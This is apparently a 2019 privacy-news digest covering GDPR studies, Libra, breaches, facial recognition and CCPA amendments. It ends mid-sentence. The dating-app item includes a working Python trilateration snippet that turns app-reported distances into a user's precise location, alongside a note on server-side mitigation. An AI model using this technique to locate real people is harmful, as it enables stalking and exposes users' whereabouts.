US – Utah to Test Blockchain Voting Through Mobile Apps

As we head toward 2020, expect significant public debate over smartphone applications designed to increase turnout and participation in upcoming elections. The Democrats announced in July plans to allow telephone voting in lieu of appearing for neighborhood caucus meetings in the key early primary states of Iowa and Nevada. Given concerns regarding the security and reliability of submitting votes over the internet, jurisdictions around the country have begun to test solutions involving blockchain technology to allow absentee voters to submit ballots. Following initial pilot programs in Denver [read earlier coverage] and West Virginia [read earlier coverage], Utah County, Utah will be the next jurisdiction to use a blockchain-based mobile voting application in connection with its upcoming municipal primary and general elections [read PR notice]. The pilot program, which will use the mobile voting application “Voatz” [see here], will allow active-duty military, their eligible dependents and overseas voters to cast absentee ballots. Eligible voters will need to apply for an absentee ballot with the county clerk and then download the mobile application. The ballot itself will be unlocked using the smartphone’s biometric data (e.g., a fingerprint or facial recognition) and then distributed into the blockchain framework for tabulation. [Data Privacy + Security Insider (Robinson + Cole) | Voting by Phone Is Convenient, But Is It Too Risky? | Utah County to pilot blockchain-based mobile voting | West Virginia and Denver say mobile voting pilots increased turnout]

Electronic Records

WW – Implementing an IG Network is Main Priority for Businesses: Study

Implementing an information governance network is the main priority for organizations in Australia and New Zealand, according to the 2019 Information Governance ANZ industry survey results. Respondents identified three key areas of IG projects: good business management practices; external regulatory, compliance or legal obligations; and internal technology restructuring or transition. More than 40% of 340 respondents said privacy regulatory changes, such as the EU General Data Protection Regulation and Australia’s Notifiable Data Breaches scheme, were the impetus behind their current IG projects. The study also revealed that IG has grown since the first IG survey in 2016: “IG appears to have matured since our initial survey, with over half assessing their IG programs as intermediate or advanced in maturity and a similar percentage ranking their IG programs as proactive rather than reactive,” according to the study.

WW – ISO Publishes First International Standards for Privacy Information Management

The International Organization for Standardization has published the first International Standards for privacy information management. ISO/IEC 27701 specifies requirements “for establishing, implementing, maintaining and continually improving a privacy-specific information security management system,” ISO said in the announcement. “In other words, a management system for protecting personal data (PIMS).” CNIL Head of the Technology Experts Department Matthieu Grall and Microsoft Corporate Vice President and Deputy General Counsel of Privacy and Regulatory Affairs Julie Brill were among those who participated in the development of the standards. “We applaud the ISO/IEC technical committee for developing this groundbreaking standard for privacy so that organizations of all sizes, jurisdictions, and industries can effectively protect and control the personal data they handle,” Brill said. [ISO.org]

EU Developments

EU – Majority of Cookie Notices Are Not GDPR Compliant: Study

Researchers from the University of Michigan and Ruhr-University Bochum in Germany examined the cookie notices of roughly 5,000 websites to see whether they comply with the EU General Data Protection Regulation. In their upcoming paper on the subject, the researchers found that 58% of notices are placed at the bottom of the screen and that 57% use “dark patterns” to nudge users into consenting to tracking. While 92% of those notices contain a link to a site’s privacy policy, only 39% mention why data is being collected. “Given the legal requirements for explicit, informed consent, it is obvious that the vast majority of cookie consent notices are not compliant with European privacy law,” the researchers state. [TechCrunch]

EU – Regulators Increase Focus on Digital Ad Industry

European Union regulators have increased their focus on the digital advertising industry. The crux of their investigations is whether advertising technology companies have violated the EU General Data Protection Regulation. The U.K. Information Commissioner’s Office released a report earlier this year in which it put the adtech industry on notice. France’s data protection authority, the CNIL, and the Irish Data Protection Commission have committed to investigations into the industry’s practices. One area of concern for regulators is real-time bidding, particularly when it is done by smaller companies that may not have the resources to properly protect the data they collect. [Wall Street Journal]

EU – Parliament Report Covers GDPR’s Impact on Scientific Research Rules

The European Parliament Panel for the Future of Science and Technology released a report last month on the impact the EU General Data Protection Regulation has on scientific research rules. The panel finds the GDPR will likely improve several aspects of scientific research, such as data security, regulatory clarity around data processing and data processor responsibilities and data subject trust. The report notes there are still some “regulatory ambiguities” around how it applies to research. In order to address those concerns, the panel offers recommendations researchers can use to “find common ground with the new legal rules on data protection and how the scientific community can prepare for GDPR compliance, with a special focus on [delineating] regulatory, procedural and educational solutions.” [EuroParl]

EU – Parliament Releases Study on Relationship Between Blockchains, GDPR

The European Parliamentary Research Service has published a report analyzing the relationship between blockchain technologies and the EU General Data Protection Regulation. The study reveals the friction between the technology and law, specifically pointing to contrasts with the defined role of a data controller and the deletion of data. Additionally, the study showed blockchains have the ability to help achieve GDPR objectives. EPRS also published policy options that could help align blockchains and the GDPR, including measures related to regulatory guidance, code of conduct and certification mechanism support and research funding. [EuroParl]

UK – Denham Offers Update on ICO’s Code of Practice for Children’s Privacy

U.K. Information Commissioner Elizabeth Denham offered an update on the code of practice the Information Commissioner’s Office is developing to protect children’s privacy. Since the ICO launched a consultation in April, Denham writes, more than 450 written responses have been sent to the agency and more than 40 meetings have been held with stakeholders. Denham hopes the code will translate requirements found within the EU General Data Protection Regulation into design standards for online services. “The GDPR already sets out rules on how data can be used and the importance of protecting children,” Denham writes. “Our code will make the requirements clearer and help designers and developers understand what is expected of them.” A final version of the code is expected to be sent to the Secretary of State by Nov. 23. [ICO.org.uk]

UK – ICO Opens Consultation on Framework for Data Use in Political Campaigns

The U.K. Information Commissioner’s Office is seeking feedback on its “Guidance on Political Campaigning,” a draft framework code of practice regarding the use of personal data in political campaigns. The framework seeks to explain and better define how data protection and electronic marketing laws apply to campaigning efforts. “This will serve both as helpful guidance in its own right as well as having the potential to become a statutory code of practice if the relevant legislation is introduced,” the ICO said in its announcement of the framework and consultation. The public consultation will remain open through Oct. 4. [ICO.org.uk]

US – CIPL Issues White Paper on New Standard Contractual Clauses

On August 7, 2019, Hunton Andrews Kurth’s Centre for Information Policy Leadership [CIPL: here] issued a white paper titled “Key Issues Relating to Standard Contractual Clauses for International Transfers and the Way Forward for New Standard Contractual Clauses under the GDPR” [read 13 pg PDF here]. The white paper was submitted to the European Commission as part of its ongoing work to update EU Standard Contractual Clauses for international transfers (“SCCs”). It highlights the main challenges organizations currently face when relying on existing SCCs and proposes practical ways to overcome these challenges by updating SCCs in line with the EU General Data Protection Regulation. The white paper focuses on three main topics as they pertain to SCCs: 1) structural and procedural formalities; 2) updating the substantive obligations contained in SCCs consistent with the GDPR; and 3) practical issues. It puts forward six key recommendations: a) SCCs should be adapted to multiparty and multiprocessing situations; b) SCCs should enable flexibility in the role of organizations (e.g., SCCs should cover processor-to-processor transfers, and consideration should be given to joint-controller situations); c) SCCs should permit organizations to adapt the language to their specific processing contexts as long as a firm set of principles is complied with; d) the broad territorial scope of the GDPR should be considered in updating SCCs; e) the relationship of SCCs with Article 28 contracts under the GDPR should be clarified; and f) a grandfather clause enabling current SCCs to remain valid under the GDPR or, at minimum, enabling organizations to prioritize the uptake of new SCC templates on the basis of specific criteria should be put in place. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

Finance

WW – Global Regulators Seek Answers on Facebook’s Libra Project

Regulators from around the world have released a statement on the privacy risks associated with Facebook’s Libra cryptocurrency service. The joint statement was signed by U.S. Federal Trade Commission Commissioner Rohit Chopra, Privacy Commissioner of Canada Daniel Therrien, U.K. Information Commissioner Elizabeth Denham, European Data Protection Supervisor Giovanni Buttarelli and commissioners from Albania and Australia. In the statement, the regulators ask how the service will be transparent about data use and how Libra will implement privacy-by-design principles. “We, the signatories to this statement, represent a cross section of the data protection regulation community,” the statement reads. “And while there are differences in our regulatory frameworks and cultures, the potential risks associated with the Libra Network and our expectations of the Libra Network to protect personal information are common to us all.” [priv.gc.ca]

UK – Data Protection Watchdog Raises Concerns Over Facebook’s Libra

On Aug. 5, the U.K. Information Commissioner’s Office released a joint statement on global privacy expectations of the Libra network [along with the privacy authorities of Albania, Australia, Burkina Faso, Canada, the European Union and the USA], addressed to Facebook and 28 other organizations behind the Libra and Calibra [see here] projects, demanding they provide details on how they plan to protect user data [read ICO PR here & 4 pg PDF joint statement here]. The letter specifically asks the companies to explain how they plan to collect and process users’ personal data in accordance with data protection laws, and notes that the Libra Association will become a custodian of massive amounts of user financial data, adding: “These risks are not limited to financial privacy, since the involvement of Facebook Inc., and its expansive categories of data collection on hundreds of millions of users, raises additional concerns.” Information Commissioner Elizabeth Denham said: “We know that the Libra Network has already opened dialogue with many financial regulators on how it intends to comply with financial services product rules. However, given the rapid plans for Libra and Calibra, we are concerned that there is little detail available about the information handling practices that will be in place to secure and protect personal information.” In July, U.S. lawmakers grilled Facebook’s David Marcus on the new project in a series of hearings at the Senate and the House of Representatives. Facebook told its investors in its latest quarterly report that, while the firm expects to launch Libra next year, regulatory pushback could significantly delay or prevent its release. [Cointelegraph]

FOI

CA – Acknowledging the Existence of Records is an Invasion of Privacy: OIPC

Yukon Information and Privacy Commissioner Diane McLeod-McKay [here] has ruled the Public Service Commission [PSC: here] was correct in refusing to confirm or deny the existence of certain records for an applicant seeking information about a PSC employee. She issued the decision document July 3 [read 19 pg PDF here], though a press release about the decision was not issued until Aug. 12 [read here], a gap that provided the required time for the PSC to respond to the decision and implement any recommendations. The PSC accepted and implemented the one recommendation McLeod-McKay provided ahead of the 30-day time limit. According to McLeod-McKay: “Looking at the ATIPP (Access to Information and Protection of Privacy) Act [see 59 pg PDF here] as a whole, and its purposes, it is clear that exceptions to access to information are carefully crafted to limit access only as much as necessary to protect certain interests. These exceptions were designed to strike the correct balance between the right of applicants to access information and the need for public bodies to limit access in specific circumstances. This provision should only be relied on by public bodies when it is necessary to protect certain interests.” This marks the first time this section of the ATIPP Act has been reviewed by the IPC, she said. Throughout her decision, McLeod-McKay cited access-to-information and privacy-protection cases in other jurisdictions, including British Columbia, Alberta and Ontario. The decision is available on the IPC’s website. Should the applicant choose to challenge McLeod-McKay’s decision, they would have to take it to the Yukon Supreme Court for a ruling. [Yukon News]

CA – YK OIPC Stresses YG’s Duty to Assist Applicants

Diane McLeod-McKay, Yukon’s Information and Privacy Commissioner [IPC: here], has issued a decision in a case in which an applicant had made 30 access to information requests to one Yukon government department over a period of a year, which she says illustrates one of the potential restrictions on the right to access information [see IPC PR here & 64 pg PDF decision here]. The department asked McLeod-McKay to grant it relief, under the Access to Information and Protection of Privacy Act (ATIPP Act), to disregard seven of the requests. The applicant’s position was that the department was improperly processing the access to information requests – which led the applicant to make numerous requests. McLeod-McKay agreed with the department that the seven requests were repetitious or systematic in nature. Requiring the department to process them, after it had already processed 23 of the applicant’s access requests, would unreasonably interfere with its operations, she found. She also authorized the department to disregard future access requests from the applicant that it finds to be (according to the tests set out in the IPC decision) repetitious or systematic and that would unreasonably interfere with its operations. In her July 31 press release [read here], McLeod-McKay said: “Section 43 of the ATIPP Act [see 59 pg PDF here] empowers me to authorize public bodies such as (the) Yukon government departments to disregard access to information requests under certain conditions. However, restricting access to information rights should not be taken lightly, and should only occur after careful consideration of all the facts. Authorizing this type of restriction under Section 43 should be the exception to the rule and not a routine option for public bodies to avoid their obligations under the ATIPP legislation.” However, McLeod-McKay indicated that the government’s records manager and the department may have failed to meet their combined duty to assist the applicant, saying: “Many of the access to information requests in this case lacked detail. Requests that do not clearly identify the records or information sought can lead to misinterpretations, which can result in some records being missed, or in access being given to unrelated records. This is serious. When a public body receives an access request, there should be no room for interpretation about the records or information sought by an applicant. If a public body receives an access request that is not clear, it must work with the records manager to clarify the request.” [Whitehorse Star]

Health / Medical

CA – Canadians Ready to Modernize Health Care with Technology, Poll Suggests

Findings from an Ipsos poll titled “The Future of Connected Health Care,” conducted between June 26 and July 2 on behalf of the Canadian Medical Association, have been released [read CMA PR & PDF]. They suggest the majority of Canadians are ready to embrace more technology in health care, and many would even trust a private company like Google or Apple with personal data if that meant 24-hour access to their doctor. Many respondents believed technology can reduce wait times and improve access through virtual visits, and that robot-assisted surgery can improve overall health. Most respondents believed technology was already good for health care, with 68% agreeing it helped their doctor keep them informed and 63% agreeing it improved their health-care experience. Eight in 10 were interested in the ability to access all of their health information on one electronic platform, and seven in 10 believed that having such a platform would reduce medical errors. But there were also concerns: 77% worried about losing human connection and 75% feared risking their privacy. Four in 10 respondents said they would subscribe to a private, paid virtual service to store personal health information if it could connect them to their doctor or health team whenever they wanted. The report notes that overall, digital approaches are “vastly underutilized (or unavailable) in Canada,” with just 1% of Canadians reporting that they had used virtual care or online patient portals. The survey involved interviews with 2,005 Canadians aged 18 and older and has a margin of error of plus-or-minus 2.5 percentage points, 19 times out of 20. [HuffPost Canada | Canadians ready for more health care tech, despite privacy concerns: survey | Canadians ready for health care to modernize, CMA poll suggests]

US – Study Explores Privacy Impacts of Prescription Drug Monitoring Programs

Prescription drug monitoring programs [PDMP] operate in all 50 states and the District of Columbia. These statewide electronic databases of prescriptions dispensed for controlled substances were established in response to the opioid overdose crisis. Their purpose is to facilitate drug diversion investigations by law enforcement, change prescribing behavior, and reduce “doctor shopping” by patients who seek drugs for nonmedical use. In 28 states it is mandatory for providers to access the database and screen each time before prescribing any controlled substance to any patient. There is evidence that PDMPs have contributed to the dramatic 42% decline in prescription opioid volume since 2011. Many healthcare practitioners cite the inconvenience and workflow disruptions of mandatory-access PDMPs as deterrents to prescribing, while others fear scrutiny from law enforcement and licensing authorities — even for appropriate medical prescribing. This is unintentionally causing the undertreatment of patients with acute and chronic pain and, in some cases, the abrupt withdrawal of treatment from chronic pain patients. There is also evidence that PDMPs increase crime by driving nonmedical users from diverted prescription opioids to more harmful heroin and fentanyl, thus fueling overdoses. Finally, PDMPs pose a serious risk to medical privacy by allowing law enforcement to access confidential medical records without a warrant based on probable cause, which may be in violation of the Fourth Amendment. An expert panel will examine the positive and negative effects of PDMPs on patient care, patient privacy, the overdose rate, and crime, hoping to learn whether they do more harm than good. [Cato Institute]

Horror Stories

UK – Unsecured Database Exposes Biometric, Personal Data of 1M in UK

The biometric and personal information of 1 million U.K. citizens was discovered on an unsecured, publicly accessible database owned by biometric security company Suprema. The database hosted facial-recognition information, unencrypted usernames and passwords, and personal information of employees. A URL manipulation by a group of Israeli researchers allowed access to the database, which held 27.8 million records in all. “If there has been any definite threat on our products and/or services, we will take immediate actions and make appropriate announcements to protect our customers’ valuable businesses and assets,” Suprema Head of Marketing Andy Ahn said. Meanwhile, U.K. Information Commissioner Elizabeth Denham has put out a statement voicing her privacy concerns regarding facial-recognition tech at King’s Cross in London. [Guardian]

US – SEC Probing Insurance Company Over Data Breach of 885M Records

The U.S. Securities and Exchange Commission has opened an investigation into a data security vulnerability at real estate title insurance firm First American Financial Corporation that led to a leak of 885 million personal and financial records. Bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts and driver’s license images were among the records exposed. The leaked information was linked to mortgage deals dating back to 2003. First American put out a statement July 16 saying that an in-house investigation revealed just 32 consumers were subject to the leak. [KrebsOnSecurity]

Law Enforcement

CA – Montreal Grapples With Privacy Concerns as More Canadian Police Forces Use Facial Recognition

Independent Montreal city councillor Marvin Rotrand wants facial recognition technology banned, and he’s preparing a motion that would put a moratorium on using the technology until clear rules are put in place. He told CBC Montreal’s Daybreak [listen here] that the city’s bylaws should be updated so that they keep pace with advances in artificial intelligence, to protect citizens’ “privacy and the protection of our democratic values.” Montreal Mayor Valérie Plante told reporters council will debate the use of such technology by the city and its police force. Montreal police would not say whether it is already using facial recognition technology, but it is being used by police elsewhere in Canada. The Toronto Police Service said last year a pilot project using the technology was an “immediate success” in helping identify suspects. The force spent $451,718 to buy its system, using funding from a policing grant from the Ontario government. Calgary police began using the technology in 2014. However, privacy advocates argue that innocent people can get swept up as verifying someone’s identity gets outsourced to AI. There is also criticism that facial recognition technology is more accurate at matching white faces than black ones. Montreal has become a hub for artificial intelligence research, including by Microsoft and Google. Idemia [see here], one of the largest vendors of face recognition and other biometric identification technology in the United States, also has a presence in Montreal. Rotrand wants the federal government to create laws governing the use of facial recognition, but for the time being he says it’s important that city council send a clear message to police that they aren’t free to use it as they please. Even as the technology becomes more reliable, he says, the threat to Montrealers’ privacy will remain. Paired with security cameras, “the police would now have a tool that would basically follow you all day long,” he said. [CBC News]

US – Police Remove Real-Time Use of Facial Recognition from Proposed Policy

Detroit police officials removed one of the most contentious provisions of the department’s proposed policy on the use of facial-recognition software: the use of the tech in real time during a terror threat. If the revised policy is approved, police officers who violate it face criminal charges or dismissal. The New York Times reports the New York Police Department has uploaded thousands of arrest photos of children and teenagers between the ages of 11 and 16 into a facial-recognition database. Opponents of the program cite concerns that the technology is unreliable when used on children, particularly as children age. [Detroit News]

Location

WW – Dating Apps May Have Exposed Exact Locations of 10M Users

Security flaws found in four dating apps may have revealed the exact locations of a combined 10 million users. Research firm Pen Test Partners created a tool that found 3Fun, Grindr, Romeo and Recon were each leaking precise locations of their users. “By supplying spoofed locations (latitude and longitude) it is possible to retrieve the distances to these profiles from multiple points, and then triangulate or trilaterate the data to return the precise location of that person,” researchers from Pen Test Partners said. Additionally, 3Fun was found to be exposing users’ birthdates, pictures and chat data. [ZDNet]
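The trilateration the researchers describe is elementary geometry: query the service from three spoofed positions, record the distance it reports to the target each time, and intersect the three circles. Below is a minimal planar sketch of the general technique in Python (this is not the researchers’ tool; coordinates are made-up x/y metres, and a real attack would first project latitude/longitude into a local planar frame):

    # Minimal planar trilateration sketch: recover a position from three
    # (point, distance) observations. Coordinates are plain x/y metres.
    import numpy as np

    def trilaterate(p1, r1, p2, r2, p3, r3):
        (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
        # Subtracting the circle equations pairwise gives a linear system
        # A @ [x, y] = b, which pins down the unique intersection point.
        a = np.array([[2 * (x2 - x1), 2 * (y2 - y1)],
                      [2 * (x3 - x1), 2 * (y3 - y1)]])
        b = np.array([r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2,
                      r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2])
        return np.linalg.solve(a, b)

    # Three spoofed query points and the distances the app reported.
    print(trilaterate((0, 0), 50 ** 0.5, (10, 0), 50 ** 0.5, (5, 10), 5.0))
    # -> [5. 5.], the target's position

The usual defence is to round or jitter the reported distances server-side so the three circles no longer meet at a single point.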

Offshore

CN – Increased Digital Services Raise Data Privacy Concerns in China

Chinese consumers are enjoying the benefits and ease of digital services but are also waking up to the data privacy concerns that come with them. Data use in the digital economy is chief among those concerns, as detailed personal information is gathered for simple online purchases, like movie tickets or food. The China Consumers Association also recently noted that a large number of mobile apps were pulling too much data, including user location, contact lists and mobile numbers. “Concerns are rising among Chinese internet users over data collection and related security issues,” former Sootoo Institute head Dingding Zhang said. “The users who don’t care about personal data leaks probably don’t realise how it can hurt them.” [Abacus]

Online Privacy

US – FBI Proposing New Surveillance on Social Media

A push by the Federal Bureau of Investigation to improve the monitoring of threats posted on social media may create privacy issues for the companies involved. The FBI’s proposal, which involves pulling public data from platforms to help curtail violence and crime, would conflict most directly with Facebook’s privacy policies. The proposed surveillance runs counter to Facebook’s rules prohibiting the use of its data for surveillance purposes, the report states. The FBI said its proposal only involves publicly available data and that data would be collected “while ensuring all privacy and civil liberties compliance requirements are met.” [The Wall Street Journal]

WW – Twitter Reveals It May Have Shared Data Without Consent for Targeted Ads

Twitter announced it may have shared data with third parties without user consent for the purpose of sending targeted advertisements. The social media platform outlined two scenarios in which data may have been inadvertently shared due to issues with the site’s settings. Since May 2018, any user who viewed ads on a mobile device and subsequently interacted with Twitter’s mobile app may have been affected, the site said in a blog post. The other scenario involved Twitter sending targeted ads based on inferences it made about users’ devices, dating back to September 2018. Twitter said it fixed both issues on Aug. 5, 2019, and is conducting an investigation to determine the number of affected users. [Reuters]

WW – Some Robocall-Blocking Apps Are Violating User Privacy

Cybersecurity firm NCC Group found that some robocall-blocking apps may be violating user privacy as soon as the apps are opened. A number of apps sent user and device data to third-party data analytics companies without user consent. Other apps uploaded device data as soon as they were opened and before users accepted privacy policies, while others sent information to Facebook as soon as the apps loaded. “Without having a technical background, most end users aren’t able to evaluate what data is actually being collected and sent to third parties,” NCC Group Senior Security Consultant Dan Hastings said. [TechCrunch]

Other Jurisdictions

AU – NTC Seeks Curtailed Vehicle Data Collection in Australia

Australia’s National Transport Commission has called for new regulations that would limit the government’s collection of vehicle data. The NTC has been examining government access to the data and whether the current collection methods carry sufficient privacy protections. “Data generated by these technologies has the potential to inform and enhance government decision making, but at the same time this technology raises potential new privacy challenges for individuals,” the NTC wrote in its “Regulating government access to C-ITS and automated vehicle data” policy paper. [ZDNet]

Privacy (US)

US – CIPL Releases White Paper on Updating SCCs for International Transfers

The Centre for Information Policy Leadership submitted a white paper to the European Commission as the Commission continues its work to update standard contractual clauses for international transfers. The white paper focuses on the challenges organizations face when they use existing SCCs and how these issues can be overcome by updating the clauses to align with the EU General Data Protection Regulation. The CIPL’s recommendations include ensuring SCCs are adapted to fit multiparty and multiprocessing situations and that the broad territorial scope of the GDPR is considered when the SCCs are overhauled. [Hunton Andrews Kurth]

IE – Human Transcription of Audio Chats Draws Scrutiny from Regulators

The Irish Data Protection Commission has asked Facebook about how it had paid contractors to transcribe users’ audio. The tech company said it was allowed to perform the activity after consumers opted in to the practice. “We are now seeking detailed information from Facebook on the processing in question and how Facebook believes that such processing of data is compliant with their GDPR obligations,” the agency said in a statement. In response to the Facebook report, U.S. lawmakers have renewed their calls for new privacy legislation. Meanwhile, Microsoft updated its privacy notice to state that staff members and contractors may listen to recordings gathered by Cortana devices and Skype Translator products. A spokesperson said, “We realized, based on questions raised recently, that we could do a better job specifying that humans sometimes review this content.” [Politico]

US – Senators Voice Concerns Over Facebook’s Handling of Children’s Privacy

U.S. Sens. Ed Markey, D-Mass., and Richard Blumenthal, D-Conn., have reached out to Facebook CEO Mark Zuckerberg with questions regarding the social network’s privacy policies and standards for children. Markey and Blumenthal wrote a letter to Zuckerberg seeking details on a flaw discovered in Facebook’s Messenger Kids app that allowed children to communicate with contacts who had not been approved by a parent. “Children’s privacy and safety online should be Messenger Kids’ top priority,” Markey and Blumenthal wrote. “Your company has a responsibility to meet its promise to parents that children are not exposed to unapproved contacts, a promise that it appears that Facebook has not fulfilled.” [The Hill | Mark Zuckerberg questioned by senators over children’s privacy protections in new letter | Senators question whether Facebook is doing enough to protect kids’ privacy | Messenger Kids: a flaw allows children to interact with unauthorized contacts | Facebook fails to keep Messenger Kids’ safety promise]

US – Google Has 2017 Cookies Settlement Struck Down by US Court Of Appeals

The 3rd U.S. Circuit Court of Appeals in Philadelphia has voided Google’s 2017 settlement regarding the unauthorized installation of cookies in users’ Safari and Internet Explorer browsers. The court of appeals voted 3-0 on the matter, saying the fairness and adequacy of the $5.5 million settlement were unclear and that it did not compensate users for their injuries. The case has been referred back to a U.S. District Court in Delaware, where the voided deal was originally approved. [Reuters]

US – Class-Action Suit Filed Over Unauthorized Siri Recordings

Apple has been hit with a class-action suit in California for alleged privacy violations related to Siri voice recordings and the human review of those recordings. The lawsuit claims Apple broke a state privacy law prohibiting the recording of people without their permission. The plaintiffs also alleged Apple wasn’t truthful when answering questions from Congress about its privacy policies. Apple, which announced a halt to its human review program this week, has said the recordings it collects and reviews are stripped of personally identifiable information. Meanwhile, Vice reports there’s evidence that Microsoft contractors are potentially listening to Skype calls. [Bloomberg]

US – Court of Appeals Allows $35B Suit Against Facebook to Move Forward

The U.S. Court of Appeals for the 9th Circuit has ruled that a class-action suit against Facebook, which could expose the company to up to $35 billion in damages under Illinois’ biometric privacy law for improper use of facial-recognition technology, can advance. The original case was brought in 2015 with claims the social network did not obtain consent or tell users how long their facial data would be stored when it started mapping their faces in 2011. Facebook argued there were no grounds to sue because the mapping did not cause any concrete harm. U.S. Circuit Judge Sandra Ikuta wrote in the court’s decision that Facebook’s facial-recognition technology “invades an individual’s private affairs and concrete interests.” [Courthouse News Service]

Privacy Enhancing Technologies (PETs)

WW – Webkit Releases New Tracking Prevention Policy

WebKit, the open-source browser engine that powers Safari, has released a new tracking prevention policy. The policy states that WebKit aims to prevent all covert and cross-site tracking, as well as fingerprinting and other yet-unknown forms of tracking. “If a particular tracking technique cannot be completely prevented without undue user harm, WebKit will limit the capability of using the technique,” the policy states. “For example, limiting the time window for tracking or reducing the available bits of entropy — unique data points that may be used to identify a user or a user’s behavior.” [TechCrunch]
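
For readers unfamiliar with the entropy framing WebKit uses, the arithmetic is simple: an attribute shared by a fraction p of browsers contributes log2(1/p) bits of identifying information, and around 33 bits are enough to single out one person among the world’s web users. A minimal sketch in Python; the attribute frequencies below are invented for illustration, not drawn from WebKit or any real survey:

```python
import math

def surprisal_bits(p: float) -> float:
    """Identifying information, in bits, of an attribute observed
    in a fraction p of the browser population."""
    return math.log2(1 / p)

# Hypothetical attribute frequencies, invented for illustration.
attribute_freq = {
    "user_agent_string": 0.01,   # shared by 1 in 100 browsers
    "screen_resolution": 0.05,
    "installed_font":    0.002,
    "timezone":          0.10,
}

# Assuming independent attributes, the bits simply add up.
total_bits = sum(surprisal_bits(p) for p in attribute_freq.values())
web_users = 4_000_000_000  # rough global web population

print(f"combined fingerprint: {total_bits:.1f} bits")
print(f"expected anonymity set: ~{web_users / 2 ** total_bits:.0f} users")
# ~23 bits here shrinks 4 billion users to a set of a few hundred, which
# is why the policy talks about reducing the entropy exposed to scripts.
```

Attributes are rarely independent in practice, so the additive total overstates precision somewhat, but the same accounting underlies fingerprinting surveys such as EFF’s Panopticlick.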

RFID / IoT

US – NIST Publishes Report on Cybersecurity Measures for IoT Manufacturers

The U.S. National Institute of Standards and Technology has published a draft report titled “Core Cybersecurity Feature Baseline for Securable IoT Devices: A Starting Point for IoT Device Manufacturers.” The document contains baseline cybersecurity features internet-of-things manufacturers can voluntarily implement in the devices they produce. The draft builds upon NIST’s “Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks.” NIST announced it will accept public comments on the new publication until Sept. 30. [CSRC.NIST.gov | NIST Releases Draft Security Feature Recommendations for IoT Devices]

Security

US – NIST Launches New Cybersecurity Blog

The U.S. National Institute of Standards and Technology has announced the creation of Cybersecurity Insights: a NIST blog. The new forum is an expansion of a previous NIST blog but will include posts on privacy engineering, the internet of things, artificial intelligence, small business, cryptography, cybersecurity education, the Cybersecurity Framework, the Privacy Framework and more. “While identity is just as important to us as it always has been, NIST conducts extensive work in the cybersecurity and privacy arenas,” NIST wrote in the post. “That portfolio of activities is growing, as is the need for a blog that addresses these varied and ever-evolving fields.” [NIST.gov]

US – Educational Software Provider Says Students at 13K Schools Affected by Breach

Pearson, a U.K.-based educational software provider, has alerted more than 13,000 schools and universities, mostly in the U.S., that a data breach potentially exposed the information of thousands of students at each institution. The U.S. Federal Bureau of Investigation notified Pearson of a cyberattack in March that compromised names, birthdates and email addresses. “We have notified the affected customers as a precaution,” a Pearson spokesman said. Information on affected districts has begun to roll in, starting Wednesday with 114,000 students at Nevada’s Washoe County School District. The Las Vegas Review-Journal reports that Nevada’s Clark County School District had 560,000 students affected by the breach. [The Wall Street Journal]

Smart Cars and Cities

US – Surveillance Concerns Raised Over Use of Streetlamp Cameras

The American Civil Liberties Union and other privacy groups are asking San Diego officials to enact surveillance protections when footage from streetlamp cameras is used in police investigations. Over the last year, the San Diego Police Department has reviewed streetlamp camera footage in more than 140 investigations. The SDPD said the footage is not shared for immigration purposes and the “video is stored on the device and erased every five days if not downloaded for an investigation.” Privacy groups have raised concerns about the lack of oversight of the program. “Decisions about how to use surveillance technology should not be made unilaterally by law enforcement or another city agency,” said ACLU Technology and Civil Liberties Attorney Matt Cagle. [The Los Angeles Times]

Surveillance

HK – Airline Reveals Use of Onboard Cameras to Record Passengers

Hong Kong airline Cathay Pacific revealed it is recording passenger activity via inflight entertainment systems and video cameras in an effort to improve and personalize the flying experience. The airline says images are not being recorded from the backseat cameras, but “there are CCTV cameras installed in our airport lounges and onboard aircraft (one camera, positioned near the cockpit door) for security purposes.” The airline says passenger data is stored on secure servers, but cautions in its updated privacy policy that “no data transmission over the internet, a website, mobile application or via email or other message service can be guaranteed to be secure from intrusion.” Further, the airline tells customers it will keep their personal data for “as long as is necessary.” [CNN]

WW – Big Tech Companies Halt Voice Recording Reviews

Apple and Amazon are scaling back human reviews of recordings from their digital voice assistants to ease user privacy concerns. Apple was the first to announce its plans, suspending analysis of Siri recordings while it reviews its accuracy grading system; a future software update will let users opt out of reviews entirely. Meanwhile, Amazon revised its privacy notice for Alexa voice recordings and now allows users to opt out of human reviews through a new option in the app settings. In the wake of the decisions, Brian Barrett wrote an op-ed for Wired arguing that human review of voice-assistant recordings should be opt-in from the start. [The Washington Post]

US Legislation

US – CCPA Update: Senate Committee Approves Privacy Law Amendments

Amendments to the California Consumer Privacy Act (CCPA) continued to advance, as the California legislature returned from its summer recess. With just five weeks to go until the September 13th deadline for the legislature to pass bills, and fewer than five months until the CCPA is set to take effect, the Senate Appropriations Committee gave the green light to six bills: AB 25, AB 846, AB 1564, AB 1146, AB 874, and AB 1355. The bills were ordered to a “second reading,” meaning they head to the Senate floor for consideration without a further hearing in the Senate Appropriations Committee. Two of those bills, AB 874 and AB 1355, will be placed on the Senate’s consent calendar, because they have not been opposed. The Senate Appropriations Committee also voted to advance AB 1202, the data broker amendment, but placed the bill in the Committee’s suspense file. This procedural action holds bills that will have a significant fiscal impact on the State of California’s budget for consideration all at once to ensure that fiscal impacts are considered as a whole. Here’s the full list of amendments as of August 12, 2019. A) Those Ordered to Second Reading in the California Senate: 1) EMPLOYEE EXEMPTION – Assembly Bill 25 changes the CCPA so that the law does not cover collection of personal information from job applicants, employees, business owners, directors, officers, medical staff, or contractors; 2) LOYALTY PROGRAMS – Assembly Bill 846 provides certainty to businesses that certain prohibitions in the CCPA would not apply to loyalty or rewards programs; 3) CONSUMER REQUEST FOR DISCLOSURE METHODS – Assembly Bill 1564 requires businesses to provide two methods for consumers to submit requests for information, including, at a minimum, a toll-free telephone number. A business that operates exclusively online and has a direct relationship with a consumer from whom it collects personal information is only required to provide an email address for submitting CCPA requests; 4) VEHICLE WARRANTIES & RECALLS – Assembly Bill 1146 exempts vehicle information retained or shared for purposes of a warranty or recall-related vehicle repair; 5) PUBLICLY AVAILABLE INFORMATION – Assembly Bill 874 streamlines the definition of “publicly available” to mean information that is lawfully made available from federal, state, or local government records. The bill also seeks to amend the definition of “personal information” to exclude deidentified or aggregate consumer information; and 6) CLARIFYING AMENDMENTS – Assembly Bill 1355 exempts deidentified or 